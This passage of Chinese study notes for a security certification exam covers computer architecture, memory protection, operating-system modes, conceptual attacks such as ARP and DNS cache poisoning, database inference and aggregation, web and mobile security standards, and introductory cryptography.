1)通用寄存器(general register)用于保存变量和临时结果。通用寄存器就像 ALU 在工作 —67— 时用到的记事本。 2)特殊寄存器(也称为专用寄存器)保存诸如程序计数器、栈指针和程序状态字(Program Status Word, PSW)之类的信息。 3)程序计数器,包含需要提取的下一个指令的存储器地址。执行这条指令后,程序计数器 的内容就会更新为下一个需要处理的指令集的存储器地址。程序状态字(PSW)保存各种不同的 条件位,其中一个条件位指出 CPU 应在用户模式(也称为问题状态),还是在特权模式(也称为 内核模式(kernel mode)或监管模式(supervisor mode))下工作。 ④数据存储设备 Storage 主存 Primary:直接供 CPU 运算用的 RAM。 辅存/次存 Secondary:当前未被 CPU 使用的数据,外部存储,硬盘光驱什么的。 虚拟内存 Virtual memory:用辅存模拟额外的主存。 虚拟存储 Virtual storage:用主存模拟辅存,提高程序打开速度。 ⑤输入/输出设备 键盘、打印机什么的,不讲了。重点讲输入/输出结构 Input/Output Structures: 存储映射 I/O,Memory-Mapped,在内存里使用一系列映射内存地址来访问外设。 直接内存访问(DMA) Direct Memory Access,不需要 CPU 处理,直接与内存交换数据。 关于存储的管理和控制这里不多讲,但很可能考到。 ⑥固件 Firmware 固件是存储在 ROM 上的软件,很少被更改,前面讲的 EEPROM 就是固件。主要有两种: 计算机主板上的 BIOS 和和其它设备的固件(路由器、打印机、机顶盒)。 3.实现内存保护的三种最常用方法是: ①分区:分区是指把计算机内存划分成若干区段。指向一个内存位置的方法包括,用一个 值标识一个区段以及该区段内的偏移。 ②分页:分页是把内存地址空间划分成大小相等的叫做页的块。分页表把虚拟内存映射到 物理内存上。分页表使附加内存的分配变得更容易,因为每个新页都可以从物理内存中的任何 位置分配出来。一个页若是未被明确分配给一个程序,这个程序将不可能访问这个页,因为每 个内存地址要么指向分配给该应用的一个页,要么生成一个叫做页错误的中断。未被分配的页 和已经分配给任何其他应用的页不会拥有该应用接触得到的地址。 ③保护键:保护键机制把物理内存划分成特意大小的块,每块都拥有一个叫做保护键的相 关数值。每个流程还拥有一个与之相关的保护键值。当内存被访问时,硬件将检查,当前流程 的保护键是否与将被访问的内存块的值相匹配如果不匹配,则会引起异常。 还有其它方法: ④地址空间布局随机化 ASLR 内存保护有其它附加技术手段,如地址空间布局随机化(ASLR)、可执行空间保护等。 ASLR 涉及在流程的内存地址空间随机安排程序的关键数据区的位置,其中包括可执行程 序以及栈、堆和库的位置。地址空间布局随机化的依据是,攻击者猜出随机排列的区域位置的 概率极低。增加搜索空间提高了安全性。 ⑤可执行空间保护 —68— 把内存区域标明为不可执行,也就是说,在这些区域执行机器代码的任何尝试都会引起异 常。许多 64 位操作系统通过某种形式的 ASLR 实施可执行空间保护,以此来预防某些种类的缓 冲区溢出,如 return-to-libe 和 return-to-plt 攻击。 二、基本概念 ①任务 tasking。执行一个程序就是一个任务。 ②进程 processes。进程就是程序运行的动态过程,是独立运行的一个程序单元,存在内 存里,是指令集和分配资源的集合,内存、CPU 时隙、API 接口、访问文件等都是资源;当进 程有具体活动需要操作系统执行时,生成一个指令集给 CPU,这就是线程,活动完成线程即撤 消。1 个程序可以作为多个进程在后台运行。进程有 3 个状态:就绪(等 CPU 时隙)、运行(执 行)、等待/阻塞(等数据输入)。 ③线程 threading。是进程中的一小段相对独立的代码,可重用也可并发运行,也是正在 被 CPU 执行的一组指令集和数据。程序可以设计成多线程(Multithreading),这样同一个程 序(进程)的不同功能模块(显示、打印、传输什么的)可以在多个不同的线程中同时运行。 不过 CPU 最好具备多线程运算能力,不然那么多线程的效果发挥不出来。同一个进程的所有线 程是共享存储资源的。 ④多任务 Multitasking。同时执行多个程序,用于单机,由操作系统协同调度。有 3 种 类型:实时多任务(Real time)、抢占式多任务(Preemptive)、协作式多任务((Cooperative)。 没有“多进程”这个概念的,多进程就是多程序,对于单个 CPU 来说,也就是多任务,就是内 存中加载很多进程。 ⑤多线程 Multithreading。一般情况下,一个进程(processes)执行一个任务/程序 (tasking),并生成一个线程(threading)等待 CPU 执行具体操作;而多线程就是指一个进程 /程序被分成多个线程来执行。一个典型的例子:同时打开多个文档时,如果通过多个进程来 实现,文档间的切换和交互需要更多的指令,速度慢;如果在同一个进程里生成多个线程来跑 不同的文档,速度会快很多。 ⑥多程序设计 Multiprogramming。用于大型机和分布式计算,自己编程来通过操作系统 协同不同主机的运算,过时了。(使用 1 个 CPU 对多个程序进交叉存取执行) 多程序与多任务的区别:一是多程序通常在大型机中使用,而多任务在 PC 系统(例如 Windows 和 Li nux)中使用;二是多任务通常由操作系统协调使用,而多程序则要求特别编写 的软件,这种软件通过操作系统来协调自己的活动和执行。 ⑦多处理器 Multiprocessing。有 2 种方式使用和控制多个 CPU:一是对称多处理(SMP), 单机用的,几个 CPU 共享同一个操作系统、内存和总线;二是大规模并行处理(MMP),大型 机用的,每个 CPU 有自己的操作系统、内存和总线(要用多程序设计来控制)。补充:单个的 四核 CPU 也算是多处理器,它相当于 4 个 CPU 的运算能力。现在常用的单机 CPU 具备 4 核 8 线 程能力。 总之:任务是用户要系统做的操作;进程是后台内存里跑的程序;线程是 CPU 里运行的活 动单元。【软件>程序/任务(内存)>线程>处理器(寄存)】 ⑧中断(IRQ) Interrupt 中断是单个 CPU 实时地处理内部或外部事件的一种内部机制,就是申请 CPU 暂停正在执行 —69— 的程序,先把中断的事件处理完了,再回来断续。它为设备指派特定的信号线即中断号。 三、操作系统/CPU 的运行机制 进程、线程什么的由操作系统控制,在 CPU 里运行,它本身是很大的安全风险的,因为存 储的数据很容易被溢出、被篡改,进程、线程也可能被恶意控制、取代什么的。所以还要进一 步深入学习操作系统。这里不能成体系的讲解,只能罗列相当的概念了。 1.操作系统的分层架构: ①单层操作系统(单块操作):所有的操作系统进程在内核模式下运行。(MS-DOS) ②分层操作系统 THE(Technische Hogeschool Eindhoven 多程序设计系统):所有的操作 系统进程使用分层模式在内核模式下运行。THE 有 5 层:0 层访问 CPU;1 层管理存储器;2 层 提供进程间的通信;3 层处理 I/O 设备;4 层驻留应用程序。 分层或环形的安全模型,只分了 4 层: 0 环:安全内核,1 环、2 环设备驱动,3 环执行应用,4 环以上不存在。 ③微内核操作系统:关键操作系统进程在内核模式下运行,其余在用户模式运行。通过限 制运行在内核模式下的进程的数量,使系统更为安全,减少复杂性,增加操作系统的可移植性。 ④混合微内核操作系统(hybrid microkemel architecture):所有操作系统进程在内核模 式下运行,关键操作系统运行在微内核,其他使用客户端\服务器模式运行。操作系统服务是 服务器,应用程序进程是客户端。 2.CPU 的 2 种操作模式: 问题状态/用户模式 User Mode:执行应用程序代码,支持部分指令,处理部分资源。 管理状态/特权模式 Privileged Mode/内核模式 kernel mode:执行操作系统代码,支持 全部指令,处理全部资源。 这两模式在后面的环式模型里也讲到了。 3.信息系统的 2 处理方式: —70— ①单一状态 Single State systems。系统一次只能处理同一个安全等级的信息。这确实 简单、安全,反正高密的、低密的都进不来。不过效率低了点。 ②多态 Multistate systems。不同安全等级的信息和操作同时在运行,不过都被互相隔 离了。这个虽然系统运行效率高了,但安全方面的投入成本很很大,还不如多部署几套系统呢。 4.计算机的处理方式 有三种保护机制:保护环、进程状态、安全模式 ①保护环 Protection Rings。 最内部的环 0,有最高的特权级别.,可以访问任何资源,是操作系统的内核(kernel)。 这个内核是指操作系统始终驻留在内存中的部分。环 1 是操作系统中没有常驻内存,用时才读 入的部分。环 2 是 I/O 驱动程序和系统工具,可以访问外围设备和特殊文件。环 3 是一般应用 程序什么的。环 0、1、2 被称为内核模式或特权模式,属于系统级的访问;环 3 以外被称为用 户模式,属于应用级的访问。 外围环使用内部环的服务必须要提出申请,这部称为居间访问模型 mediated-access Model。(这个居间是对 mediated 的翻译,指位于中间的人,即起到协调作用的中介。)通过 居间访问调用高级别的资源时,系统会检查并确认访问全体的身份和授权。 ②进程状态 前面讲过进程有 3 种状态:就绪、运行和等待/阻塞。其中运行状态也被称为“问题状态” (problem state),是指计算机正在处理和解决某个问题,也指这个计算过程中是可能发生 问题或错误的。 其实,进程还有 2 种状态: 监管 Supervisory:进程要使用比运行状态更高级别的资源(更改系统配置、安装驱动程 序、更改安全设置什么的)时,就要使用监管状态。也就是环 3 模式(用户模式)或运行状态 里不具备的功能,都要到监管状态下才有。 停止 Stopped:进程被终止,释放内存等资源。 E.1 基于客户端 (例如: 小程序、本地缓存) 这里讲针对单机的攻击和漏洞。 1.Applets 在本地单机安装的客户端软件(浏览器插件),为了更好的使用 WEB 服务,提供更多的功 —71— 能。有 2 种常用的:基于 JAVA 的 Java Applet 和基于微软.NET 的 ActiveX 控件。Java applet 和 ActiveX 控件的主要区别是 Java 为代码运行建立一个沙箱,并且限制代码访问用户计算机 系统上的资源。ActiveX 使用依赖于数字签名和信任认证授权的身份验证码技术。尽管两者都 是很好而有趣的技术,但是它们都存在内在的缺陷。Java 不能保证所有代码都在沙箱中运行, 这容易引起几种类型的安全危害,这些危害都是恶意软件的示例。ActiveX 不一定提供安全性, 事实上,它总是向用户弹出讨厌的警告对话框 2.本地缓存 Local Caches ①ARP 缓存中毒 ARP 协议是将 IP 地址解析为 MAC 地址的协议。这种攻击使客户端传输的数据流发送给不 是预期的其它系统(另一个 MAC 地址),这种攻击也被用来做中间人攻击。动态 ARP 缓存:攻 击者回应 ARP 广播查询并发送伪造的回复,这样 ARP 缓存一起缓存,直到超时(通常是 10 分 钟)。静态 ARP 缓存:本地执行 ARP 命令,这需要通过木马、缓冲区溢出或社会工程攻击才能 在客户端运行。 ②DNS 缓存中毒 另一个比较流行的中间人攻击方式,类似于 ARP 缓存,让主机访问别的地址。主要手段有: 主机中毒、授权 DNS 服务器攻击、缓存 DNS 服务器攻击、DNS 查找地址改变以及 DNS 查询欺骗。 主机文件 HOSTS file:将常用的或访问过的域名(域名也被称为 FQDN:fully qualified domain name)与 IP 地址的映射存储在本地,方便下次上网用,提高速度。修改这个文件就可 以让访问重新定向。 授权 DNS 服务器攻击 Authorized DNS server:直接修改权威 DNS 服务器(根服务器)的 数据库,于是全网的域名解析都被篡改了,很严重,所以很快会被发现并纠正的。 缓存 DNS 服务器攻击 caching DNS servers:运营商或企业为了速度,缓存了从其他 DNS 服务器获得的 DNS 信息,搞它要容易多了,也不易被发现。 DNS 查找地址改变 DNS lookup address changing:这个很直接,通过修改 DHCP 服务器或 修改本地静态 IP 地址,篡改主机的 DNS 地址,让主机到另一个伪造的 DNS 服务器上去查询。 DNS 查询欺骗 DNS query spoofing:这个有点难,但也经常发生。攻击者截获主机的 DNS 查询请求,然后发回错误的结果,让主机访问错误的网站,把 DNS 服务器屏蔽了。 ③Internet 临时文件中毒 上网浏览时,所有网站的内容都被缓存到本地的临时文件夹里。被植马的网站页面文件(图 片、HTML 什么的)会被缓存到本地,然后就等待被调用或激活。 E.2 基于服务器端 (例如:数据流控制) 服务器的攻击和漏洞,大部分是针对传输的数据流的。这里没啥内容。 E.3 数据库安全 (例如: 数据推理、 数据聚合、数据挖掘、数据分析、 数据仓库) 数据库安全必考,基础内容看第八域 A 章节。 1.聚合 Aggregation 聚集攻击是通过收集大量的低安全级别的或低价值的数据,将它们结合起来,创造较高安 全级别或有价值的信息。对于数据库来讲,就必须严格控制对聚合函数的访问并且充分估计可 —72— 能展示给未授权个体的潜在信息,这些对数据库安全管理员来说是特别重要的。 SQL 就供了许多可从一个或多个表中组合记录并生成有用信息的函数包括 count,mm, mate,sum,avg 等,这一过程就是聚合。数据库管理员应该严格控制聚合函数的访问,并且 可以使用视图(view)的访问方式。防范聚合的对策有: ①基于内容的访问控制(Content-dependent access control):根据数据本身的敏感度来 管理访问控制。 ②数据库分区技术可以防止聚合和推理。每个分区都具有唯一的、不同安全级别的内容。 ③视图可以防止聚合攻击。在数据库中实现多级安全性的一种途径是使用数据库视图。视 图可以整理来自多个表的数据、聚合单独的记录或限制用户访问数据库属性和/或记录的有限 子集。在数据库中,视图被存储为 SQL 语旬,而不是被存储为数据表。这样可以减少所需的数 据库空间,并且允许视图违反应用于数据表的规格化规则。因为视图非常灵活,所以许多数据 库管理员将视图作为一种安全工具使用,就是允许用户只与受限的视图交互,而非与作为视图 基础的原始数据表交互。 ④结合严格访问控制、“需知”和最小特权原则来预防聚合攻击。 2.推理 Inference 推理与聚合有点像,推理攻击利用几个非敏感信息片的组合,从而获得对应该属于更高级 分类的信息。推理需要利用人的推断能力,而聚合只是简单的叠加。对于推理攻击的最好的防 范是对有特权的个人用户保持持续的警惕。此外,数据的故意混淆可以被用来防止对敏感信息 的推理。最后,你可以使用数据库分区帮助降低这些攻击。防范推理攻击的方法有: ①单元抑制(cell suppression):隐藏特定存储单元的内容,限制用户对特定内容的访问。 ②数据库分隔/分区(database partition):把数据库逻辑分区,用视图来提供访问。 ③噪声与扰动(noise and perturbation):在数据库中插入伪造信息,误导和迷惑攻击者。 ④基于上下文的访问控制(Contest-dependent access control):根据访问的状态或者顺 序来限制对某些内容的访问,需要一定的学习功能。 ⑤基于内容的访问控制(Content-dependent access control):根据数据本身的敏感度来 管理访问控制。(信息分级) ⑥多实例(Plolyinstantiation)在同一个关系数据库表中两行或更多行(无组)具有相 同的主键,且为不同密级的用户提供不同的数据查询结果,就是多实例。主要防范推理攻击。 (这个点经常考到) 下面这些内容在第八域的数据库与数据仓库小节里详述。 3.数据挖掘 Data Mining 数据挖掘可用来揭示数据仓库中隐藏的关系、模式和趋势。很简单,不解释。讲下元数据 的概念:就是描述数据的数据,或者关于数据的数据,也就是信息的数据。 4.数据仓库 Data Warehousing 将异构的,广泛分布的,很多的,独立的数据库关联到一起就成了数据仓库。 5.大数据、数据分析 联机事务什么的,没啥好说的。 E.4 大型并行数据系统 —73— 没啥考的。 E.5 分布式系统 (例如:云计算、 网格计算、 对等计算) 1.云计算 Cloud Computing 美国国家标准和技术研究所 NIST 把云计算定义为一种模型,包括五个基本特点、三个服 务模型和四个配备模型组成。 五个基本特点: ①按需自助;②宽带网络访问;③资源池化;④快速弹性;⑤可计量的服务。 三个服务模型: ①软件即服务(SaaS)应用软件云:为用户提供直接可以使用的网络软件服务,一般基于浏 览器。它的灵活性是比较低的,有什么用什么,综合性的比较少。 ②平台即服务(PaaS)/平台开发云:为用户提供一个托管平台,承载用户自己的应用。在 云基础设施上部署自己开发或采购的各种服务,必须遵守该平台的接口和环境如编程框架、数 据存储模型等。 ③基础设施即服务(IaaS)/基础设施云:为用户提供的是底层的、接近于直接操作底层服 务接口,可以使用计算机资源、存储资源和网络资源等更多的基础资源。但软件全要用户自己 来开发。 四个配备模型: ①专有云;②社区云;③公共云;④混合云。 2.网格计算 Grid Computing 网格计算是并行分布处理的一种形式。类似于通信里的自组网,联网单机只要空闲就可以 加入网格群来完成个小任务。不过网络计算是全公开的,这并不安全,有的单机也可能出现问 题而影响整个计算进度。 网格计算常常被与“集群计算”混为一谈,它们的区别是: ①这两种计算都涉及用两台或多台计算机来解决问题,但网格计算是异质的,而集群计算 是同质的。 ②网格计算机可以配备不同的操作系统、硬件和软件。 ③网格计算机还具备多任务同时处理功能(一台计算机既是一个配有空闲CPU 资源的网格 的组成部分,同时又可执行常规台式机功能),而集群只用于一项任务。 ④集群常通过连接节点的快速总线或网络把物理位置拉近,而网格则是在地理上散布的。 E.6 密码系统 看本域的第 I 章节。 E.7 工业控制系统 (例如:SCADA) 工业控制系统(ICS) 工业控制系统(ICS)Industrial Control Systems 是一种用于控制工业生产过程和机器 的计算机管理设备。工业系统和关键基础设施通常由叫做工业控制系统(ICS)的简单计算机监 测和管理。ICS 建立在标准嵌入式系统平台上,往往使用商业现货软件。ICS 是用于控制制造、 产品处理、生产、配送等工业流程的。 —74— ICS 类型包括: ①监测控制和数据采集/数据采集与监控系统(SCADA)系统。 ②分布式控制系统/集散控制系统(DCS)。 ③可编程逻辑控制器(PLC)。 ④可编程逻辑器件(PLD)Programmable Logic Device,就是可编程的数字集成电路,可以 完成大量的组合逻辑运算(与、或)。 其中 SCADA 用的最多,这个很厉害的,“震网”病毒就是通过它搞坏硬件基础设施,这里 不多讲了。 F.评估和减缓基于 Web 系统的脆弱性(例如:XML,OWASP) 1.可扩展标记语言(XML) XML 是万维网络联盟(W3C)的文本文件数据结构化标准,目的是使数据格式和数据可以在 内联网和 Web 上共享。 标记语言,如超文本标记语言(HTML),只是用于识别文档结构(格式)的一种符号和规则系 统。XML 被称作可扩展,是因为符号是无限的,可由用户或作者定义。XML 格式可用独立于数 据库、应用和所涉 DBMS 的一种中性格式来表现数据。 2.安全断言标记语言(SAML) 在第 5 域 B.6 章节重点讲了。 安全断言标记语言(SAML)是基于 XML 的一种用于交换认证和授权信息的标准。SAML 在设 计上允许带不同身份管理系统的联邦式系统通过简化登录和一次登录交换进行交互。 尽管 SAML 的设计有着与生俱来的安全性,安全架构师还必须确保执行不会弱化该语言的 安全。例如,当传递 SAML 断言,说明如果系统省略授权请求的标识符或接收者的身份,攻击 者将能未经授权访问用户账号的时候。 3.OpenID Connect OpenID Connect 是基于 OAuth 2.0 规范系列的一种可互操作的认证协议。它使用了直接 REST/JSON 消息流,设计目的是“让简单的事情简单,让复杂的事情变成可能。” OpenID Connect 与 OpenID 2.0 在架构上有许多相似之处,事实上,这两个协议解决了非 常近似的一组问题。然而,OpenID 2.0 使用的是 XML 和一种定制消息签名方案,而实践证明, 开发人员有时很难把它搞定。因此,OpenID 2.0 的执行有时会神秘地拒绝互操作。OpenID Connect 则在需要签名的时候使用标准 JSON Web 令牌(JWT) 数据结构。这给执行 OpenID Connect 的开发人员带来极大便利,从而大大提高了互操作性。 如果要用户用 google 的账户来登陆一个网站,就用 OpenID。在第五域 B.1 章节计单点登 陆里,提到了 OpenID。 4.开放 Web 应用安全项目(OWASP)/如何确保网站安全 在第八域 B.1 章节也讲了。OWASP 是一个致力于提高软件安全性的非营利机构。OWASP 开 发了大量免费的实用产品,其中包括: ①OWASP 十大项目:基于 Web 应用存在的十大缺陷给出抑制它们的方法。 ②OWASP 指南项目:一部说明如何设计出安全的 Web 应用和服务的全面手册。 —75— ③OWASP 软件保障成熟度模型(SAMM):SAMM 是一个框架,用于针对机构面临的具体风险量 体裁衣地设计软件。 ④OWASP 移动项目:为开发人员和架构师开发和维护安全移动应用提供了资源。 有鉴于基于 Web 和基于云的解决方案使用得非常普遍,OWASP 提供了一个带 Web 应用安全 流程的可访问全面框架。你应该对 OWASP 的作品有一个全面的了解,搞清如何将其应用到自己 的任务中。OWASP 识别出的 10 大顶级风险有: A1:注入;A2:跨站脚本攻击(XSS);A3:无效的认证和会话管理; A4:不安全的直接对象引用;A5:跨站请求伪造(CSRF); A6:安全配置错误;A7:不安全的加密存储;A8:URL 访问限制失败; A9:薄弱的传输层保护;A10:未经验证的重定向和转发。 5. Web 应用安全联盟(WASC) Web 应用安全联盟(WASC)是一个组织,它为 Wor1d Wide Web 和组成万维网的基于 Web 的 软件提供了最佳安全实践标准。这个组织提供了一系列的资源、工具和信息,可以通过它们了 解这些基于 Web 的软件开发中常见的安全问题以及如何避免它们。该组织拥有一个 Web 应用 程序扫描评估标准,可用于评估各种厂家的产品和实践。它提供了 Web 应用程序的安全指标和 威胁分类,并维护着蜜罐进行实时超文本传输协议(HTTP)的 Web 威胁流量分析。这个组织阐述 的最常见的顶级攻击方法有: ①跨站请求伪造(CSRF);②跨站攻击(XSS);③拒绝服务攻击(DOS); ④已知漏洞;⑤暴力攻击;⑥隐藏参数操作;⑦网银木马;⑧点击劫持。 6.内建安全 Build Security In (BSI) 美国国土安全部(DHS)提供的最佳实践、工具、指南、规则、原则和其他资源,软件开发 人员、架构师和安全从业者可以在开发的每一个阶段用它们把安全整合到软件中。DHS 最初被 称为 Build Security In(BSI),它与其他提到的组织一起协同工作,使整个行业的许多单位 可以参与其中并提供有用的材料。美国国土安全部(DHS)有一个软件保障计划来维护 BSI。 BSI 提供了一个与过程无关的方法,可用它处理需求、架构和设计、编码、测试、系统、 管理及基本原则。这个成果和 MITRE 公司创始的常见缺陷列表(CWE)紧密结合在一起,常见缺 陷列表 CWE 维护了最危险的顶级软件错误。 7.ISO/IEC 27034 ISO/IEC 也制定了关于软件开发的标准。ISO/IEC 27034 标准包括以下条目:应用安全综 述和概念、组织规范框架、应用程序安全管理过程、应用安全验证以及特定应用的安全指南。 它是 ISO/IEC 27000 系列的一部分,它能让安全的软件开发过程与 ISO/IEC 的信息安全管理体 系(ISMS)模型相一致。 8.标准选择 上面列举了网络通信的标准、Web 安全的标准,还有软件开发的标准,各有优长。哪个“最 佳实践”或标准最适合你的呢?大多数标准是足以通用于不同的组织和各种软件开发过程,但 每一种方法都有其特定的关注重点。CMMI(能力成熟度模型集成)是个过程改进模型;WASC 和 OWASP 的重点是将安全集成到网络软件开发过程中;BSI 重点是保护关键基础设施,但也可 以用于任何软件开发项目,而 ISO/IEC-27034 是一个通用性的做法,多使用在单独的行业中。 —76— 与大多数技术标准一样,它们之间有很多重合之处。 G.评估和减缓移动系统的脆弱性 主要是安全意识方面了,要有好的习惯什么的。由个人所拥有的设备可使用和应用任何以 下术语:便携式设备、移动设备、个人移动设备(PMD)、个人电子设备或便携式电子设备(PED) 和个人拥有的设备(POD)。 1.设备安全 ①笔记本电脑等设备最好全系统加密,以防被盗。 ②手机等重要设备丢失,最好能远程擦除或毁钥什么的。 ③离开要锁屏,多次密码错误要锁机。还有好多好多,不写了。 2.应用安全 ①密钥要管好,最好有 TPM 芯片。还有什么无所谓了。 3.安全对策 ①全设备加密 如果一个设备上的存储媒休都可以被加密,这将是一个有价值的功能。然而,加密不是对 数据的保护的保证,特别是如果设备被盗,系统本身有一个己知的后门攻击漏洞。 移动设备使用 IP 语音(VoIP)服务时可以使用语音加密。 ②远程擦除 如果一个设备丢失或被盗、远程擦除或远程清除就成为一种常见的措施。擦除过程可以通 过移动电话服务或互联网连接进行触发。然而,远程擦除也不是数据安全性的保证。小偷只要 不让设备联网就行了。 ③锁定 当用户未能提供他们的凭据并多次重复尝试后,帐户或设备被禁用(锁定在一段时间内〉 或直到管理员清除锁定标志。 ④锁屏 锁屏是为了防止有人随便拾起并能使用你的手机或移动设备。如果黑客通过蓝牙、无线或 USB 电缆等方式连接到设备上,屏幕锁不一定真的能保护设备。 ⑤GPS 跟踪 ⑥应用控制(强制安装安全软件) ⑦存储分隔(隔离操作系统、应用数据、用户数据) ⑧资产跟踪;⑨库存控制;⑩移动设备管理 MDM;⑾数据访问控制;⑿可移动存储 ⒀关闭不使用的功能。 3.BYOD 自带设备(Bring Your Own Device) BYOD是一项政策,允许员工在工作携带自己的个人移动设备并使用这些设备连接(或通过) 公司网络业务资源和/或互联网。虽然 BYOD 可以提高员工的士气和工作满意度,但它增加了组 织的安全风险。如果 BYOD 策略是开放式的,则任何设备可以连接到公司网络。并不是所有的 移动设备都有安全功能,因此这样的策略不符合设备连上生产网络的标准。一个 BYOD 策略应 强制要求特定的设备以减少这种风险,但它可能会要求公司为那些无法购买自有兼容设备的员 —77— 工购买设备。 ①数据所有权。个人数据和业务数据要分开、隔离。 ②所有权支持。明确移动设备坏了谁修。 ③补丁管理。定义个人移动设备的补丁管理方法和机制。 ④反病毒管理。规定反病毒、反恶意以及反间谍扫描软件是否要在移动设备上安装。 ⑤取证。BYOD 策略应该解决相关移动设备的取证和调查。 ⑥隐私。ßYOD 策略应该解决隐私和监控。 还有:遵守公司策略、用户接受、架构/基础设施考虑、法律问题、.可接受策略、内置摄 像头/视频等等。 H.评估和减缓嵌入式设备和网络物理系统的脆弱性(例如:可启用网络设备、物 联网(LoT)) 1.嵌入式系统安全 ①网络隔离。还有好多,反正不考,考了也很容易。 2.物联网安全 网络化物理系统(CPS)是嵌入有传感器、处理器和致动器的智能联网系统,在设计上可以 感知物理世界(包括人类用户)并与其交互,支持安全关键应用的实时和有保障运转。基于 CPS 的架构面临着多种挑战,其中有两个是需要安全专业人员和架构师特别关注的: *网络安全;*互操作性。 I.应用密码学 实现安全的重要方法手段,号称是信息安全的基石。不考具体的算法,考是的怎么应用好 密码学,每次考个 10 几题。 一、密码学的发展史 1.早期(人工)时代 凯撒密码/替代密码:已知最早的一种密码系统。朱利叶斯凯撒征服欧洲时在罗马与西塞 罗通信时所使用的密码系统。它简单地将字母表中的每个字母都替换为其后的第三个字母,被 称 C3 密码。另一种替代密码是 ROT13(字母移动 13 个位置)。 2.机械时代 ①Enigma 的商业编码机:二战德国使用。使用三到六个转子实现了一种极复杂的替换密 码,加解密要用同原理的编码机才行。相应的,同盟国军方通过代号为 Ultra 的绝密工作, 由波兰军方成功地复原了一台 Enigma 原型机。 ②一次性密码本 OTP(vernam cipher/one-time pad):也称为 Vemam 密码,是唯一宣称 只要执行得当便不可破解的密码系统。密码本只能使用一次并且必须与明文同长,使用决不可 重复。一次性密码本是不可被频率分或许多其他密码攻击手段破解的。 ③多表密码/维吉尼晋城密码:这是一种使用多个表(不是一个字母表)的简单替换密码。 教材里用这个算法来解释算法、密钥、密钥空间、加密等概念。 3.现代密码时代 —78— 计算机的各种加密算法和很长的密钥。 4.量子密码学 传统密码学基于数学理论加密,而量子密码学则是利用物理学来保护数据安全。量子密码 学(也叫量子密钥分配,简称 QKD)构建在量子物理学之上。最重要的理论是非维尔纳·海森堡 的不确定原理:一个人不可能无限准确地同时知道一个粒子的位置和动量。具体而言,量子密 码学是一组协议、系统和可以用来创建和分配秘密密钥的规程的集合体。量子密码学解决的是 密钥分配问题,密钥交换完成后,常规密码算法便可以使用了。量子密码学完善了安全性,因 为每当有人试图窃听安全信道内容的时候,这种行动都会干扰光子的流动,很容易被人识别, 从而提供了额外的安全。 量子密码学内有两条独有的信道: ①一条信道用来通过单光子光脉冲传输量子密钥材料; ②另一条信道携带所有消息流,其中包括密码协议、加密的用户通信流等等;根据量子物 理学原理,当一个光子被观察到时,它的状态已经改变了。 二、密码学的基础概念 1.密码学的目标 ①可用性。②机密性。③完整性。 除了上述信息安全的三大核心原则外,密码工具还可提供其他几个好处。 ④不可抵赖性。防止接收者篡改消息并诡称消息的原始状态就是如此。只有公钥(或非对 称密钥)密码系统才提供不可否认性。 ⑤身份认证。主要通过密钥控制实现,因为只有掌握了密钥的人才能加密消息。 ⑥访问控制。只有有权访问正确密码密钥的人才能进行访问。 2.术语 ①明文:P ②密文:C ③Kerchoff 原则:算法应当公开,但是所有密钥都应当保密。(Auguste Kerckhoff 于 1883 年发表了一篇论文,指出一个密码系统唯一需要保密的部分应当是密钥。他声称算法应当公开, 并且断言:如果安全基于过多的秘密,那么就会有更多的脆弱性可供利用。) ④单向函数(One-Way Functions):不可能逆向运算出原始值的函数。理论上没有,实 际上很多,因为人们还没算出破解函数来。 ⑤随机数(Nonce)/初始向量(IV):这是一个与消息长度相同的随机比特串,并且与原 始信息相异或。在每次使用相同密钥加密相同的消息时,密文总不一样。 ⑥零知识证明(Zero-Knowledge Proof):不告诉你密码是什么,但是我可以通过开门来 证明我拥有这个密码。 ⑦分割知识(Split Knowledge):和职责分离差不多。要得到一个密钥、或者要开一个 门,不能让一个系统搞定、或一个人搞定;必须要几个系统或人同时工作才行。避免密钥被轻 易篡改。 ⑧工作函数/工作因素(Work Function/Work factor),即工作量:工作函数或工作因数 —79— 这个概念,用来衡量密码的强度或解密的难度,一般用成本或时间来表示。也就是暴力破解一 个密码所需的计算时间。 ⑨加密算法的简写。 在一些资料中,你可能会遇到 RC5-w/r/b 或 RC5-32/12/16 这类符号。它是说明算法配置 的简略表达形式。 •w=word=分组长度(字长),单位为位,长度可为 16、32 或 64 位。 •r=round=转换轮数,其值介于 0——255 之间。 •b=bit=密钥长度,16 字节为 128 位。 3.逻辑运算 ①与,AND,∧ 双真才为真,其它为假 ②或,OR,∨ 有真就是真,双假才是假。 ③非,NOT,!,~ 取反。 ④异或,ExclusiveOR,XOR,⊕。最重要的计算机运算。 不同就是真,相同就是假。 ④模,MOD。最重要的密码学运算。 求整除后的余数。 4.什么是密钥 早期密码系统的算法是必须保密的,没什么所谓的密钥;算法一旦公开或被破解,就没任 何保密性了。而现代密码系统的算法是全公开的,安全性靠密钥来实现;也就是说各类系统都 使用相同原理的“锁”,给不同的用户主体配不同的“钥匙”就行了。密钥就是一长串的字符, 长度是 2 的很多次方,很长很长。 密钥聚类(Key Clustering):使用相同加密算法但不同密钥对同一明文进行加密产生相 同密文的情况。这种情况实际减小了密钥空间,从而降低了密码强度。 密码术(cyptograpgy):通过加密和解密使通信双方对外界隐藏和验证通信信息的技术 或科学。AIO 用这个词,其它其它教材叫“密码学”。 密码分析(cryptanalysis):在不知道加密算法中使用的原始密钥的情况下,把密码转 换成明文的和运算。 密码学(cryptology):研究密码术和密码分析的科学。 三、密码学方法 加密数据有两种主要方法:流方法和块方法。主要也是用在对称加密里的。 1.流密码 stream cipher 逐位执行加密的密码系统叫做基于流密码(分组为 1 位的块密码就是流密码了)。这是最 常用在流应用上的一种方法,例如,语音或视频传输无线等效隐私(WEP)使用了流密码 RC4。 由于存在把加密密钥暴露给攻击者的许多弱点例如弱密钥大小,这种密码被认为不安全。 流密码使用密码流生成器(keystream generator),就像是“一次性密码本”,它生成的 —80— 位流与明文位进行异或,从而产生密文。正确实施流密码的难点在于要生成一个真正随机而平 衡的密钥流,一般要用初始化向量 IV 来提高随机性。 2.块密码/分组密码 block cipher 块密码对成块的文本运算。明文在输入密码系统的过程中,被分解成预定大小的块—通常 是 ASCⅡ码大小的倍数——64、128、192 位等。一个强密码必须具有两个主要属性:扰乱和扩 散,以确保攻击者不可能对其进行逆向工程。扰乱(confusion)通常通过替代实现,扩散 (diffusion)则通过换位实现。密钥值的随机性和数学函数的复杂性也决定了所涉及的扰乱和 扩散的级别。大多数块密码结合使用了替代和置换运算。这使块密码相对而言强于大多数基于 流密码,但计算密度更大,执行成本往往也更高。也正是由于这个原因,许多基于流密码在硬 件中执行,而基于块密码在软件中执行。 